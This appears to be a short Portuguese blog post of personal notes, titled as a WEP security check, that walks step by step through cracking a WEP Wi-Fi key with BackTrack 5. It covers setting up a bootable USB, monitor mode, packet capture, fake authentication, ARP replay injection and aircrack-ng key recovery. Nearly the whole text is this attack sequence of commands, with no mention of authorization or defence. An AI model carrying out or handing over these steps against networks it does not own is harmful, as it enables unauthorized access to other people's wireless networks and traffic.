Verificação segurança WEP

Fiz isto apenas para não me esquecer dos passos:

--- Download e instalação:

1º download blacktrack 5 r2 (ou a versão mais actual)
2º download Universal USB Installer, para criar um pen-boot
3º formatar a pen para fat32, instalar ...
Na parte dos ficheiro de presistencia escolhi só 600mb, se for muito grande a instalação demorá mais...
4º reiniciar o pc e iniciar pela pen
5º escolher a opção blactrack text (aparecem duas? - escolhi uma qualquer)
6º quando tiver o [root] escrever "startx" [abre a versão gráfica].
7º conectar a pen wireless (no meu caso TP-Link Wn722n)
já têm tudo no blacktrack, está pronta a correr!! (preço 20€)

--- Inicio da ligação:

8º Abrir terminal e verificar qual a placa que queremos usar
iwconfig
  wlan0 (no meu caso)
9º  corer airdump para verificar o chanel da rede (wlan0 no meu caso)
  airodump-ng wlan0
 10º corer o airmon (no meu caso chanel: 6)
airmon-ng start wlan0 6
   Ele dis-me que a interface em monitor corre no mon2 (no meu caso)

 11º  agora fazer um teste para ver se conseguem fazer injection (mon2 no meu caso)
aireplay-ng mon2 -9
12º fazer ficheiro backup do airodump (chose a file name : my = "example")
airodump-ng mon2 --channel 6 -w /root/example.cap
13º associar o receptor com o emissor (no meu caso SSID rede = OLA-123)
aireplay-ng -1 0 -e OLA-123 mon2
14ºAtacar com (arp request replay)
aireplay-ng -3 -e OLA-123 mon2
15º correr o aircrack (atençao ao nome e local do ficheiro do ponto 12)
aircrack-ng -s /root/example*.cap
  Colocar o asterisco a seguir ao nome

16º escolher o numero no index que nos é mostrado (no meu caso "1")

17º Esperar até ser mostrada a Key:("1234567890" no meu caso)

 

FONTE: video youtube



0 comentários :

Enviar um comentário